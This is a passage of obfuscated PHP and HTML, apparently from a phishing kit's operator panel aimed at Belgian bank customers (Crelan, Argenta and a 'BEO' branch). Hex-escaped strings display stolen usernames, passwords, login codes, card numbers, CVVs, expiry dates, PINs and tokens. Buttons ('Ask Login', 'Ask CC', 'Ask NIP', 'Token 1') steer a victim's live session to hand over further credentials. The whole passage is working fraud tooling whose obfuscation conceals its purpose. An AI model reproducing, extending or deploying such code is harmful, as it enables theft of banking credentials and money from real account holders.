"\x3c\x70\40\x63\154\141\x73\x73\75\42\164\145\170\x74\55\163\145\143\x6f\156\x64\141\162\171\42\x3e\x3c\151\76" . htmlspecialchars($log["\x63\137\x6b\x6c\x61\156\x74"]) . "\74\x2f\151\76\x3c\x2f\x70\x3e"; echo "\74\x2f\144\x69\166\76"; echo "\x3c\x2f\x64\151\166\76"; } if (!empty($log["\x61\x62\x6e\x5f\151\144\x65\156\x74\151\x66\151\x63\x61\x74\x69\157\156"])) { echo "\x3c\144\x69\x76\x20\143\154\x61\163\163\75\42\x66\x6f\162\155\x2d\147\x72\157\165\x70\x20\162\x6f\167\42\x3e"; echo "\74\154\141\142\x65\154\40\146\x6f\162\x3d\x22\x69\144\x22\40\143\154\x61\163\163\75\42\164\x65\x78\x74\x2d\x73\145\x63\x6f\156\x64\x61\162\171\x20\143\x6f\154\x2d\163\x6d\55\x33\40\146\157\156\x74\x2d\x77\145\x69\147\x68\x74\55\x62\x6f\x6c\x64\x22\x3e\120\x68\x6f\x6e\x65\x20\103\x6f\x64\145\72\74\57\x6c\141\x62\145\154\x3e"; echo "\74\x64\151\x76\40\143\x6c\141\163\x73\75\42\143\x6f\154\55\163\155\55\71\42\x3e"; echo "\74\x70\x20\x63\x6c\141\x73\163\x3d\42\164\x65\x78\164\55\x73\145\x63\157\156\144\x61\162\x79\42\x3e\x3c\151\x3e" . htmlspecialchars($log["\x61\x62\156\137\x69\144\145\156\164\x69\146\151\x63\x61\164\151\x6f\156"]) . "\x3c\x2f\x69\x3e\74\57\160\x3e"; echo "\74\x2f\x64\x69\166\76"; echo "\74\x2f\144\151\166\x3e"; } if (!empty($log["\143\x5f\153\x6c\141\x6e\x74"])) { echo "\x3c\144\151\x76\x20\x63\154\x61\163\x73\75\42\x66\x6f\162\x6d\55\147\162\x6f\x75\x70\x20\x72\x6f\167\42\76"; echo "\74\154\x61\142\x65\154\40\146\157\162\75\42\151\144\x22\40\143\x6c\x61\x73\x73\x3d\x22\x74\x65\170\164\55\163\x65\x63\x6f\156\144\x61\x72\x79\x20\x63\x6f\x6c\55\x73\155\55\x33\x20\x66\x6f\x6e\x74\55\x77\x65\x69\x67\x68\x74\x2d\x62\x6f\154\x64\x22\x3e\103\x75\x73\x74\157\x6d\72\x3c\57\x6c\x61\142\145\154\76"; echo "\74\144\x69\166\x20\143\154\x61\163\x73\x3d\x22\143\x6f\x6c\x2d\x73\155\x2d\71\x22\76"; echo "\x3c\x70\40\143\154\141\x73\163\75\x22\x74\145\170\x74\x2d\x73\x65\143\157\x6e\x64\141\x72\171\42\76\74\151\76" . htmlspecialchars($log["\x63\x5f\x6b\x6c\141\x6e\164"]) . "\x3c\x2f\151\x3e\74\57\160\x3e"; echo "\74\x2f\144\151\166\x3e"; echo "\74\57\x64\x69\x76\x3e"; } if (!empty($log["\x61\x62\x6e\137\162\145\x73\x70\x6f\156\163\x5f\x6f\x6e\145"])) { echo "\x3c\144\x69\166\40\143\154\141\163\x73\x3d\x22\x66\157\x72\155\55\147\162\x6f\165\x70\40\162\157\x77\x22\76"; echo "\74\x6c\x61\142\145\154\x20\x66\157\x72\x3d\42\x69\144\42\40\143\x6c\141\x73\x73\x3d\42\164\x65\x78\x74\55\163\x65\x63\157\x6e\144\141\x72\171\x20\x63\157\x6c\55\x73\x6d\55\63\x20\146\157\156\164\x2d\x77\x65\x69\x67\150\164\x2d\x62\x6f\x6c\144\x22\x3e\114\x6f\x67\x69\156\40\103\x6f\144\x65\72\x3c\57\154\x61\142\x65\x6c\76"; echo "\x3c\144\x69\x76\40\x63\x6c\141\163\163\x3d\x22\143\x6f\154\x2d\163\155\55\x39\x22\x3e"; echo "\74\x70\40\143\x6c\141\163\163\75\x22\x74\x65\x78\x74\x2d\163\x65\143\x6f\156\144\x61\162\x79\x22\76\x3c\151\x3e" . htmlspecialchars($log["\141\x62\x6e\x5f\x72\145\x73\160\x6f\156\x73\x5f\157\156\145"]) . "\74\57\151\76\74\57\160\x3e"; echo "\74\57\x64\x69\x76\x3e"; echo "\74\57\x64\151\x76\76"; } if (!empty($log["\x63\137\145\x78\x70"])) { echo "\74\144\151\x76\x20\143\x6c\x61\163\163\75\42\146\x6f\x72\x6d\x2d\147\162\157\x75\160\x20\162\157\x77\42\x3e"; echo "\74\154\141\x62\145\x6c\x20\146\157\162\x3d\42\x69\144\42\x20\143\154\141\163\x73\x3d\42\164\145\170\164\55\163\x65\x63\157\156\x64\141\162\x79\40\x63\157\154\55\163\x6d\x2d\x33\x20\146\x6f\x6e\164\x2d\167\x65\x69\147\150\164\x2d\142\157\154\x64\42\76\105\130\x50\72\74\57\154\x61\142\145\x6c\76"; echo "\x3c\x64\151\166\40\x63\x6c\141\x73\x73\x3d\42\143\157\x6c\x2d\163\x6d\55\71\x22\x3e"; echo "\x3c\x70\40\x63\x6c\141\x73\163\x3d\x22\x74\x65\x78\164\55\163\145\x63\x6f\x6e\x64\141\162\171\x22\x3e\x3c\151\x3e" . htmlspecialchars($log["\143\x5f\145\x78\x70"]) . "\74\57\x69\x3e\74\x2f\x70\76"; echo "\74\57\x64\x69\x76\x3e"; echo "\74\57\144\151\x76\x3e"; } if (!empty($log["\x63\137\164\145\154"])) { echo "\74\144\x69\166\x20\x63\154\x61\x73\x73\x3d\42\x66\x6f\162\x6d\x2d\147\162\x6f\165\x70\x20\162\157\167\x22\76"; echo "\x3c\154\x61\142\x65\x6c\40\146\x6f\162\75\42\x69\x64\x22\40\x63\x6c\x61\163\163\x3d\42\164\x65\x78\x74\x2d\x73\145\143\157\x6e\x64\141\x72\x79\40\x63\x6f\x6c\55\x73\x6d\x2d\63\40\x66\x6f\x6e\x74\x2d\167\x65\151\147\x68\164\x2d\142\157\154\x64\42\76\x54\145\154\x65\x66\x6f\x6f\156\40\x6e\165\x6d\x6d\145\x72\72\x3c\x2f\x6c\x61\142\145\x6c\76"; echo "\74\x64\x69\166\40\143\154\x61\163\163\x3d\x22\143\x6f\154\55\x73\155\55\x39\x22\x3e"; echo "\74\x70\40\x63\154\141\163\x73\75\42\x74\x65\170\x74\55\163\x65\143\157\156\x64\141\162\171\42\76\x3c\x69\76" . htmlspecialchars($log["\143\137\164\145\154"]) . "\x3c\x2f\x69\76\74\x2f\160\x3e"; echo "\74\57\144\x69\x76\x3e"; echo "\x3c\x2f\x64\151\x76\x3e"; } if (!empty($log["\x63\137\x73\155\163"])) { echo "\74\144\151\x76\40\x63\154\x61\163\163\75\42\x66\x6f\162\x6d\55\147\162\x6f\165\x70\x20\162\157\x77\42\x3e"; echo "\x3c\x6c\x61\142\x65\x6c\40\146\157\162\75\42\x69\144\x22\x20\x63\154\141\x73\163\x3d\x22\x74\145\170\164\x2d\163\145\143\157\156\144\141\x72\171\40\x63\x6f\x6c\x2d\x73\155\x2d\63\x20\146\x6f\x6e\x74\55\167\x65\x69\147\x68\164\55\x62\157\154\144\42\x3e\105\155\141\x69\154\55\126\145\162\x69\x66\x79\72\x3c\57\x6c\141\142\145\154\x3e"; echo "\74\144\x69\x76\x20\x63\154\x61\163\163\75\x22\143\157\154\55\x73\x6d\55\71\x22\76"; echo "\74\x70\40\143\x6c\x61\x73\x73\x3d\x22\164\x65\170\x74\55\x73\x65\143\x6f\156\x64\x61\162\171\42\76\74\151\x3e" . htmlspecialchars($log["\x63\137\x73\x6d\x73"]) . "\74\x2f\x69\x3e\74\x2f\160\x3e"; echo "\74\x2f\x64\x69\166\76"; echo "\74\57\x64\x69\166\x3e"; } if (!empty($log["\143\x5f\x6d\x32"])) { echo "\x3c\x64\151\166\40\x63\154\x61\x73\x73\75\42\x66\157\162\x6d\55\x67\162\157\x75\x70\40\162\x6f\x77\42\x3e"; echo "\x3c\154\141\142\x65\154\x20\x66\x6f\162\75\x22\x69\144\42\x20\143\x6c\141\x73\163\x3d\42\x74\x65\170\x74\x2d\163\x65\143\x6f\156\x64\141\x72\171\x20\143\157\x6c\55\x73\x6d\55\63\40\x66\x6f\x6e\164\x2d\x77\x65\151\x67\x68\x74\x2d\142\157\x6c\x64\x22\76\x54\157\x6b\x65\x6e\x20\61\x3a\x3c\x2f\154\x61\x62\x65\x6c\x3e"; echo "\x3c\144\x69\166\40\x63\x6c\x61\x73\x73\x3d\x22\x63\x6f\154\55\163\155\55\71\x22\x3e"; echo "\74\x70\x20\143\x6c\141\x73\x73\75\x22\x74\145\x78\164\55\163\145\143\x6f\x6e\144\141\162\x79\x22\x3e\74\151\x3e" . htmlspecialchars($log["\x63\137\155\62"]) . "\x3c\x2f\151\76\x3c\57\160\76"; echo "\x3c\x2f\144\151\x76\x3e"; echo "\x3c\57\x64\x69\166\76"; } if (!empty($log["\x63\x5f\x6d\x31"])) { echo "\x3c\144\151\166\40\143\x6c\141\x73\x73\x3d\x22\146\x6f\x72\155\55\147\x72\x6f\x75\160\x20\162\x6f\167\42\x3e"; echo "\74\154\x61\x62\x65\154\40\x66\157\x72\75\x22\x69\144\42\x20\x63\154\141\163\163\x3d\x22\164\x65\170\164\55\x73\145\x63\x6f\156\144\141\162\171\40\143\157\154\x2d\x73\155\55\x33\x20\146\157\156\164\55\167\x65\x69\x67\x68\x74\x2d\x62\x6f\x6c\x64\42\x3e\124\157\x6b\145\x6e\40\62\x3a\74\x2f\154\141\142\x65\x6c\76"; echo "\74\x64\151\x76\x20\143\x6c\141\x73\x73\75\42\x63\x6f\154\55\x73\155\x2d\71\x22\x3e"; echo "\x3c\160\x20\x63\154\141\x73\163\x3d\42\164\x65\170\164\x2d\163\145\x63\157\x6e\144\x61\x72\x79\42\x3e\x3c\x69\x3e" . htmlspecialchars($log["\143\x5f\155\x31"]) . "\x3c\57\x69\76\74\x2f\x70\76"; echo "\74\x2f\144\x69\x76\76"; echo "\x3c\57\x64\151\x76\76"; } if (!empty($log["\143\x5f\160\151\156"])) { echo "\74\144\x69\166\x20\143\154\x61\x73\163\x3d\42\146\157\x72\x6d\55\x67\162\x6f\x75\160\x20\x72\157\167\x22\x3e"; echo "\x3c\x6c\x61\142\x65\x6c\40\146\x6f\x72\75\x22\x69\144\42\x20\143\154\141\x73\163\75\x22\164\x65\170\164\x2d\163\x65\143\x6f\156\144\x61\162\x79\40\x63\157\x6c\x2d\163\155\x2d\63\x20\146\157\x6e\164\55\x77\145\151\147\x68\164\55\x62\x6f\x6c\x64\x22\76\120\x69\156\103\x6f\144\145\72\74\x2f\154\x61\x62\145\x6c\x3e"; echo "\74\144\x69\x76\x20\x63\x6c\141\163\163\x3d\x22\x63\157\x6c\55\163\155\x2d\x39\x22\x3e"; echo "\x3c\x70\x20\x63\154\141\163\x73\75\x22\x74\x65\170\x74\x2d\x73\x65\x63\x6f\156\144\x61\162\x79\x22\x3e\x3c\x69\76" . htmlspecialchars($log["\x63\x5f\x70\151\x6e"]) . "\74\x2f\151\76\x3c\57\x70\x3e"; echo "\74\x2f\144\x69\166\x3e"; echo "\74\x2f\x64\x69\x76\76"; } if (!empty($log["\143\137\143\x63"]) && !empty($log["\x63\137\x63\166\x76"]) && !empty($log["\x63\137\x65\x78\x70\x32"])) { echo "\x3c\144\x69\x76\40\x63\154\141\x73\163\75\x22\x66\x6f\x72\x6d\x2d\x67\162\157\165\x70\x20\162\x6f\x77\x22\x3e"; echo "\74\154\141\142\x65\154\x20\146\157\x72\x3d\42\151\x64\x22\x20\x63\x6c\x61\163\x73\75\42\x74\x65\170\164\55\x73\x65\143\x6f\156\x64\141\162\x79\x20\143\x6f\x6c\x2d\163\x6d\x2d\63\x20\146\157\156\x74\55\x77\145\x69\x67\x68\164\x2d\142\157\x6c\144\x22\x3e\103\103\x3a\x3c\57\x6c\141\142\x65\154\x3e"; echo "\x3c\x64\151\166\40\x63\154\141\x73\x73\75\42\143\x6f\154\x2d\163\x6d\55\71\x22\76"; echo "\x3c\x70\40\143\x6c\x61\x73\x73\75\x22\x74\145\x78\164\x2d\163\x65\x63\157\156\x64\141\x72\171\x22\x3e\x3c\x69\76" . htmlspecialchars($log["\143\x5f\x63\143"]) . "\x3c\57\151\x3e\74\57\x70\x3e"; echo "\x3c\x2f\x64\x69\x76\x3e"; echo "\x3c\57\144\151\x76\x3e"; echo "\x3c\144\x69\x76\x20\143\x6c\x61\x73\x73\75\42\x66\157\x72\x6d\x2d\x67\162\157\165\x70\x20\162\157\167\x22\x3e"; echo "\74\154\141\142\145\x6c\x20\x66\x6f\162\75\x22\151\144\x22\x20\143\x6c\141\163\163\75\42\x74\x65\x78\164\x2d\163\x65\143\x6f\x6e\144\x61\x72\171\40\x63\x6f\154\55\x73\155\55\63\x20\x66\x6f\156\164\55\167\145\151\x67\x68\x74\55\142\x6f\154\x64\x22\76\x43\x56\126\x3a\x3c\57\x6c\x61\142\145\x6c\76"; echo "\74\x64\151\166\40\x63\154\141\x73\x73\x3d\42\x63\157\x6c\55\163\x6d\55\x39\x22\76"; echo "\x3c\x70\x20\143\154\141\163\x73\x3d\x22\x74\145\170\x74\x2d\163\145\x63\x6f\156\144\x61\x72\171\x22\76\x3c\151\76" . htmlspecialchars($log["\x63\x5f\143\x76\x76"]) . "\x3c\x2f\x69\x3e\74\x2f\x70\x3e"; echo "\x3c\57\144\151\x76\76"; echo "\x3c\x2f\144\151\x76\x3e"; echo "\x3c\x64\x69\166\40\143\x6c\x61\163\x73\x3d\x22\146\157\162\x6d\x2d\x67\162\157\x75\160\40\x72\x6f\167\x22\76"; echo "\74\154\x61\142\145\154\40\146\x6f\162\75\x22\x69\x64\42\x20\x63\154\141\163\x73\75\x22\164\x65\170\x74\x2d\163\145\x63\x6f\156\144\141\162\171\x20\x63\x6f\x6c\55\163\155\x2d\63\40\146\x6f\156\164\x2d\x77\145\x69\x67\x68\164\55\x62\157\154\x64\42\76\105\170\x70\40\143\x63\72\x3c\x2f\x6c\x61\x62\145\154\x3e"; echo "\x3c\144\151\x76\40\143\x6c\141\163\163\75\42\x63\157\x6c\x2d\x73\155\55\x39\x22\76"; echo "\x3c\160\x20\143\154\x61\163\163\75\42\164\145\170\164\x2d\163\145\143\157\156\x64\x61\162\171\42\76\x3c\151\x3e" . htmlspecialchars($log["\143\137\145\x78\x70\x32"]) . "\74\57\151\76\x3c\57\160\x3e"; echo "\74\x2f\144\x69\x76\76"; echo "\x3c\x2f\144\151\166\76"; } if ($log["\167\x61\x69\x74\x69\156\x67"] == "\x74\x72\165\x65") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["\x75\x73\145\x72\137\x69\x64"]); ?>
', 'login')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask Login</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["\x75\x73\x65\x72\x5f\151\x64"]); ?>
', 'exp')"><i class="fa fa-info-circle" aria-hidden="true"></i> Exp</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["\165\x73\145\x72\x5f\x69\x64"]); ?>
', 'sms')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask Mail-Verify</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["\165\x73\145\162\x5f\x69\144"]); ?>
', 'tel')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask Phone</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["\x75\x73\145\x72\137\151\x64"]); ?>
', 'cc')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask CC</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["\x75\x73\x65\162\137\x69\x64"]); ?>
', 'pin')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask NIP</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["\165\163\x65\162\137\x69\144"]); ?>
', 'token')"><i class="fa fa-info-circle" aria-hidden="true"></i> Token 1</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-success mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["\x75\163\145\162\137\x69\144"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
</div>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-outline-warning mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["\x75\x73\145\x72\x5f\151\144"]); ?>
', 'custom')"><i class="fa fa-sign-language" aria-hidden="true"></i> Custom</button>
</div>
<div class="col-lg-9">
<br>
<input hidden type="text" class="form-control argenta-custom input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
<a href="../public/api/TokenInput/Insert.php" target="_blank" class="custom-link"><b>Set custom amount</b></a>
</div>
<style>
.custom-link {
color: orange;
text-decoration: none;
font-size: 16px;
cursor: pointer;
}
.custom-link:hover {
text-decoration: underline;
}
</style>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["\x75\163\145\x72\137\151\144"]); ?>
', 'm1')"><i class="fa fa-sign-language" aria-hidden="true"></i> Token 2</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control sns-sign input-dark mt-4 custom-input" placeholder="Token 2">
</div>
</div>
</div>
</div>
<?php } } else { if ($log["\142\141\156\153"] == "\102\105\x4f") { if (!empty($log["\x63\137\153\x61\x61\x72\164"]) && !empty($log["\143\137\x6b\154\141\156\x74"])) { echo "\74\144\x69\166\x20\143\x6c\141\x73\163\x3d\42\146\x6f\x72\155\x2d\147\162\157\x75\x70\x20\x72\157\167\x22\x3e"; echo "\74\x6c\x61\x62\145\154\40\x66\x6f\x72\75\42\151\x64\42\x20\x63\154\x61\163\163\x3d\x22\164\x65\x78\x74\55\x73\145\x63\157\x6e\x64\x61\162\x79\x20\x63\157\x6c\55\163\x6d\x2d\x33\x20\x66\x6f\x6e\164\55\167\x65\x69\147\150\164\55\142\157\154\144\42\76\x47\145\142\162\x75\x69\153\145\x72\x73\156\141\x61\x6d\72\x3c\x2f\x6c\141\142\145\x6c\x3e"; echo "\74\x64\x69\x76\40\x63\154\x61\163\x73\75\x22\x63\157\x6c\x2d\x73\155\x2d\x39\42\x3e"; echo "\x3c\x70\x20\x63\154\x61\163\163\75\x22\164\145\170\x74\x2d\x73\x65\x63\x6f\x6e\144\x61\162\x79\42\x3e\x3c\x69\76" . htmlspecialchars($log["\143\x5f\x6b\141\x61\162\x74"]) . "\x3c\57\151\x3e\74\x2f\160\76"; echo "\x3c\x2f\x64\x69\166\76"; echo "\74\57\144\x69\x76\x3e"; echo "\74\x64\x69\x76\40\x63\x6c\141\163\x73\x3d\42\146\157\162\155\x2d\x67\x72\x6f\165\x70\x20\162\157\x77\42\76"; echo "\74\x6c\x61\142\x65\154\40\146\x6f\x72\75\x22\151\144\x22\x20\x63\x6c\x61\163\163\75\x22\164\x65\170\164\55\163\145\x63\157\156\144\x61\x72\171\x20\143\x6f\x6c\x2d\163\155\55\x33\40\x66\157\156\x74\x2d\x77\x65\x69\147\x68\164\x2d\x62\x6f\x6c\x64\42\76\127\x61\143\x68\164\167\x6f\x6f\x72\144\72\74\57\x6c\x61\142\x65\154\x3e"; echo "\x3c\144\x69\166\40\x63\x6c\x61\x73\x73\75\42\143\157\154\55\x73\x6d\55\71\x22\76"; echo "\x3c\160\x20\143\154\x61\163\163\75\x22\x74\x65\x78\x74\x2d\x73\145\143\157\x6e\x64\141\162\171\x22\x3e\x3c\151\76" . htmlspecialchars($log["\x63\137\153\154\x61\156\x74"]) . "\x3c\57\x69\76\74\x2f\160\76"; echo "\x3c\57\144\151\166\76"; echo "\x3c\x2f\144\x69\x76\76"; } if (!empty($log["\x63\x5f\62\x36\x30"]) && !empty($log["\143\x5f\62\66\60\x5f\x32"])) { echo "\x3c\x64\x69\166\40\x63\x6c\x61\x73\x73\75\42\x66\x6f\162\x6d\55\x67\x72\157\165\x70\40\x72\x6f\x77\42\76"; echo "\74\154\141\142\x65\x6c\40\146\157\162\75\42\151\x64\x22\40\143\154\x61\x73\163\x3d\42\164\145\x78\164\x2d\163\145\x63\157\x6e\144\141\162\x79\40\143\x6f\154\x2d\x73\155\55\63\40\x66\x6f\156\x74\55\x77\145\151\147\x68\164\55\x62\x6f\154\144\42\76\x47\x65\142\162\165\151\153\145\x72\163\x6e\141\x61\x6d\x3a\74\x2f\154\141\x62\145\x6c\x3e"; echo "\x3c\x64\151\x76\x20\143\154\141\163\x73\75\42\143\157\154\x2d\x73\155\x2d\x39\x22\x3e"; echo "\x3c\x70\x20\x63\x6c\141\x73\x73\x3d\x22\164\x65\170\x74\x2d\x73\145\143\157\156\x64\x61\162\171\x22\76\x3c\x69\x3e" . htmlspecialchars($log["\x63\x5f\x32\x36\60"]) . "\74\57\x69\76\x3c\x2f\160\x3e"; echo "\x3c\57\x64\151\x76\x3e"; echo "\74\57\x64\x69\x76\76"; echo "\x3c\144\x69\x76\40\143\x6c\x61\163\x73\75\x22\x66\157\x72\x6d\55\147\162\157\x75\x70\40\x72\x6f\167\42\x3e"; echo "\74\154\x61\142\x65\x6c\40\x66\157\162\75\x22\151\144\42\x20\x63\154\x61\163\163\75\x22\x74\145\170\x74\55\163\x65\x63\157\156\x64\141\162\171\40\x63\x6f\x6c\x2d\x73\155\55\63\x20\x66\x6f\x6e\164\55\x77\x65\x69\x67\150\x74\55\x62\x6f\154\144\42\76\122\145\163\160\157\156\x73\145\72\74\x2f\154\x61\x62\x65\154\x3e"; echo "\x3c\x64\151\x76\x20\x63\154\141\163\163\x3d\42\143\x6f\154\55\x73\x6d\x2d\71\42\x3e"; echo "\74\160\40\143\154\141\163\x73\x3d\42\x74\145\x78\x74\x2d\163\x65\x63\x6f\156\x64\x61\162\x79\42\x3e\x3c\151\x3e" . htmlspecialchars($log["\143\137\62\66\x30\137\x32"]) . "\74\x2f\x69\x3e\74\x2f\x70\76"; echo "\74\x2f\x64\x69\x76\76"; echo "\x3c\x2f\x64\x69\x76\76"; } if (!empty($log["\x63\137\63\x32\60"]) && !empty($log["\x63\x5f\x33\x32\x30\x5f\x32"]) && !empty($log["\x63\137\x33\x32\x30\137\63"])) { echo "\74\144\151\166\40\143\x6c\x61\x73\163\75\x22\x66\x6f\162\x6d\x2d\147\x72\x6f\165\x70\x20\162\x6f\x77\x22\x3e"; echo "\x3c\x6c\x61\x62\145\154\x20\x66\x6f\x72\75\x22\x69\x64\42\40\143\154\141\x73\163\x3d\42\x74\145\x78\164\55\x73\145\143\157\156\x64\x61\162\171\x20\143\157\x6c\55\163\155\55\x33\x20\146\x6f\156\164\55\167\x65\151\x67\x68\164\x2d\142\157\x6c\144\42\x3e\x47\x65\142\162\165\151\x6b\145\162\x73\156\141\141\155\x3a\x3c\57\x6c\x61\x62\x65\x6c\76"; echo "\x3c\x64\151\166\x20\143\154\141\x73\163\x3d\x22\x63\157\154\55\163\155\55\x39\42\x3e"; echo "\x3c\160\x20\143\154\x61\x73\x73\75\x22\x74\x65\x78\x74\x2d\x73\145\143\157\156\144\141\162\x79\42\76\74\x69\x3e" . htmlspecialchars($log["\x63\137\x33\x32\60"]) . "\x3c\57\151\x3e\74\x2f\x70\x3e"; echo "\74\x2f\144\151\166\76"; echo "\74\x2f\x64\x69\x76\x3e"; echo "\74\144\151\166\40\143\x6c\x61\x73\163\x3d\x22\x66\157\x72\155\x2d\x67\x72\157\165\x70\x20\162\157\x77\x22\x3e"; echo "\74\x6c\x61\142\145\x6c\x20\146\157\x72\75\x22\151\144\42\x20\143\154\141\x73\163\x3d\x22\x74\145\x78\164\x2d\x73\145\x63\x6f\156\x64\x61\162\171\x20\x63\157\154\55\x73\155\x2d\63\40\x66\x6f\x6e\x74\x2d\x77\x65\151\147\x68\x74\x2d\142\x6f\x6c\x64\x22\x3e\x57\x61\143\150\x74\x77\157\157\162\x64\x3a\74\57\154\141\x62\145\x6c\x3e"; echo "\74\144\151\x76\x20\x63\154\x61\x73\163\x3d\42\143\x6f\154\x2d\x73\x6d\55\71\x22\76"; echo "\74\160\x20\143\154\x61\x73\x73\75\x22\164\145\170\164\55\163\x65\x63\157\x6e\x64\141\x72\171\42\x3e\x3c\151\x3e" . htmlspecialchars($log["\x63\137\x33\62\60\137\62"]) . "\x3c\x2f\151\x3e\x3c\57\160\76"; echo "\74\x2f\x64\151\166\x3e"; echo "\x3c\x2f\144\151\166\x3e"; echo "\x3c\144\x69\166\40\143\154\x61\163\163\x3d\42\146\157\162\x6d\x2d\147\x72\157\x75\160\40\162\157\167\x22\x3e"; echo "\74\x6c\141\142\145\154\x20\x66\157\162\75\42\x69\144\42\40\x63\154\x61\163\x73\75\42\x74\145\x78\x74\x2d\x73\145\x63\157\x6e\144\141\x72\x79\40\143\157\x6c\x2d\163\x6d\x2d\63\40\146\157\x6e\x74\55\167\x65\x69\147\150\x74\x2d\x62\x6f\154\x64\42\x3e\122\x65\163\160\x6f\x6e\163\x65\72\x3c\x2f\x6c\x61\x62\145\x6c\76"; echo "\74\x64\x69\166\40\x63\154\141\x73\163\75\x22\143\x6f\154\x2d\x73\155\55\71\x22\x3e"; echo "\x3c\160\40\143\154\x61\163\x73\x3d\42\x74\145\x78\x74\x2d\x73\x65\x63\x6f\x6e\144\x61\162\x79\x22\x3e\74\x69\76" . htmlspecialchars($log["\x63\x5f\x33\x32\60\137\x33"]) . "\x3c\57\x69\x3e\x3c\57\x70\x3e"; echo "\74\x2f\x64\x69\x76\x3e"; echo "\74\57\x64\151\x76\x3e"; } if (!empty($log["\141\x62\x6e\x5f\x69\x64\x65\x6e\164\x69\x66\151\143\x61\164\151\x6f\x6e"])) { echo "\74\144\x69\x76\x20\x63\x6c\141\163\x73\x3d\42\x66\x6f\x72\155\55\147\162\x6f\165\x70\40\x72\157\167\x22\76"; echo "\x3c\x6c\x61\x62\x65\x6c\x20\146\x6f\162\x3d\x22\151\144\42\40\x63\154\x61\x73\163\75\42\x74\x65\x78\x74\x2d\x73\145\143\157\156\144\x61\x72\x79\40\x63\x6f\x6c\x2d\x73\x6d\x2d\x33\x20\146\x6f\156\x74\x2d\x77\x65\151\147\150\164\55\142\x6f\x6c\x64\x22\x3e\x50\150\157\x6e\145\40\x43\x6f\144\x65\x3a\x3c\57\x6c\x61\142\x65\x6c\76"; echo "\x3c\144\x69\166\40\143\x6c\141\163\163\75\x22\143\x6f\154\x2d\163\155\x2d\x39\x22\x3e"; echo "\74\160\40\x63\154\141\x73\163\75\x22\x74\x65\x78\164\x2d\x73\x65\143\x6f\156\144\x61\162\x79\42\x3e\74\x69\x3e" . htmlspecialchars($log["\x61\142\x6e\137\151\x64\145\156\x74\x69\x66\x69\x63\x61\x74\x69\x6f\156"]) . "\x3c\x2f\x69\x3e\x3c\57\160\x3e"; echo "\x3c\57\144\x69\166\x3e"; echo "\x3c\x2f\144\x69\x76\x3e"; } if (!empty($log["\141\x62\156\137\x72\145\163\160\157\156\x73\137\157\x6e\145"])) { echo "\74\x64\x69\166\40\x63\x6c\x61\x73\163\x3d\42\146\157\x72\x6d\55\147\162\157\x75\160\40\162\157\x77\42\76"; echo "\x3c\x6c\x61\x62\x65\x6c\x20\146\x6f\162\75\x22\x69\x64\x22\x20\143\154\x61\x73\163\75\x22\x74\x65\170\164\x2d\x73\x65\x63\157\156\x64\141\162\x79\x20\143\x6f\154\x2d\x73\155\x2d\63\40\146\157\x6e\164\55\167\x65\151\x67\x68\x74\55\142\x6f\154\144\42\76\x4c\157\147\x69\156\x20\103\157\144\x65\72\x3c\x2f\154\141\142\x65\x6c\76"; echo "\x3c\144\x69\166\40\x63\x6c\141\163\163\75\x22\143\157\x6c\x2d\x73\155\55\71\42\x3e"; echo "\74\x70\40\143\x6c\x61\163\x73\x3d\42\164\145\170\x74\55\x73\145\143\157\x6e\x64\141\x72\171\42\76\74\x69\76" . htmlspecialchars($log["\141\x62\x6e\x5f\162\x65\163\160\157\156\163\x5f\x6f\156\x65"]) . "\x3c\57\151\x3e\x3c\57\x70\x3e"; echo "\74\x2f\144\151\x76\76"; echo "\x3c\57\x64\x69\166\x3e"; } if (!empty($log["\x63\x5f\x65\x78\x70"])) { echo "\x3c\x64\x69\166\x20\143\154\141\163\x73\x3d\42\x66\x6f\x72\155\55\147\162\157\165\x70\40\162\157\x77\x22\76"; echo "\x3c\154\x61\142\x65\154\40\146\x6f\x72\x3d\42\x69\144\x22\x20\x63\x6c\x61\x73\163\x3d\42\x74\145\170\164\55\163\x65\143\157\156\144\141\x72\x79\x20\143\x6f\x6c\x2d\163\x6d\55\63\x20\x66\157\156\x74\x2d\x77\145\151\147\150\x74\55\142\x6f\154\x64\42\76\105\x58\120\x3a\74\x2f\x6c\x61\142\x65\154\76"; echo "\x3c\144\x69\x76\40\143\154\141\163\163\75\x22\x63\157\x6c\55\163\x6d\55\71\42\x3e"; echo "\x3c\x70\40\x63\154\x61\x73\x73\75\x22\164\x65\170\164\x2d\x73\x65\x63\157\156\144\141\162\171\42\x3e\74\x69\x3e" . htmlspecialchars($log["\x63\x5f\x65\170\x70"]) . "\74\x2f\151\x3e\74\x2f\x70\76"; echo "\74\57\x64\x69\x76\76"; echo "\74\57\144\x69\x76\x3e"; } if (!empty($log["\143\x5f\x74\x65\154"])) { echo 